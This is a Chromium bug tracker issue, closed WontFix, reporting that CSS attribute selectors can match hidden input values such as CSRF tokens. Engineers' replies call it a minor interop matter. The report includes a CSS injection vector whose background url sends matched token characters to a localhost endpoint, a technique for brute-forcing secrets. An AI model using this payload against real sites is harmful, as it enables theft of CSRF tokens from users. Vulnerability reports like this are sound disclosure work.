New issue
Advanced search Search tips

Issue 651163 link

Starred by 2 users
Status: WontFix
Owner: ----
Closed: Sep 2016
Cc:
style-bugs@google.com
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 2
Type: Bug



Sign in to add a comment

Hidden html element attribute value is accessible via CSS

Reported by begam.as...@gmail.com, Sep 28 2016 
UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0

Steps to reproduce the problem:
CSS3 Attribute selectors can get the information about the hidden element attribute value , 
vector:

input[name=csrf][value^=t][value$=n]{
 background-color: yellow;
 background: url("http://localhost:8080/test/640.jsp?firstAndlastchar=tn");
}

<input  type="hidden" width="500px" value="token" name="csrf">

1. Browsers (such as Firefox) will not allow to select the value of the hidden attribute value

2. Web application which allows the css as user input can bruteforce the vector to get the sensitive information 

What is the expected behavior?

What went wrong?
Access of hidden attribute from css has to be restricted

Did this work before? N/A 

Chrome version: Version 53.0.2785.101 (64-bit)  Channel: n/a
OS Version: 14.04
Flash Version: Shockwave Flash 11.2 r202
Screenshot from 2016-09-29 00:09:14.png
147 KB View Download
Screenshot from 2016-09-29 00:08:33.png
97.2 KB View Download

Comment 1 by elawrence@chromium.org, Sep 28 2016

Components: Blink>CSS
I'm not aware of anything that considers "hidden" inputs a security mechanism, but the CSS team should probably triage and consider whether to track as a functionality bug.

Comment 2 by kenrb@chromium.org, Sep 28 2016

Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug
I'm removing this from the security queue.

Values in <input type="hidden"> fields are not really a secret to the user, since they can be observed in devtools or even by monitoring the network traffic. The fact that they are hidden mostly reflects that the web application won't work properly if the user modifies them.

Sometimes they can be of significance to attackers who control other websites, such as is the case with CSRF tokens, but same origin policy protects it (i.e. attacker websites should not be able to affect the CSS of the target site).

As elawrence suggests, this might warrant investigation on the basis of it diverging from Firefox's behavior.

Comment 3 by elawrence@chromium.org, Sep 28 2016

Status: Untriaged (was: Unconfirmed)
I looked at this further, and IE behaves as Chrome does.

Firefox does match the CSS value selector, as you can verify in their developer tools. The reason you don't see the network request is very likely that they've undertaken an optimization whereby they don't bother fetching the background image for a hidden input as the image is not rendered to the user.

So I believe this is working as intended.

Comment 4 by dstockwell@chromium.org, Sep 29 2016

Labels: -OS-Linux Hotlist-Interop OS-All
Status: WontFix (was: Untriaged)
This seems like a minor interop issue, probably very low risk of actually causing interop problems.

Sign in to add a comment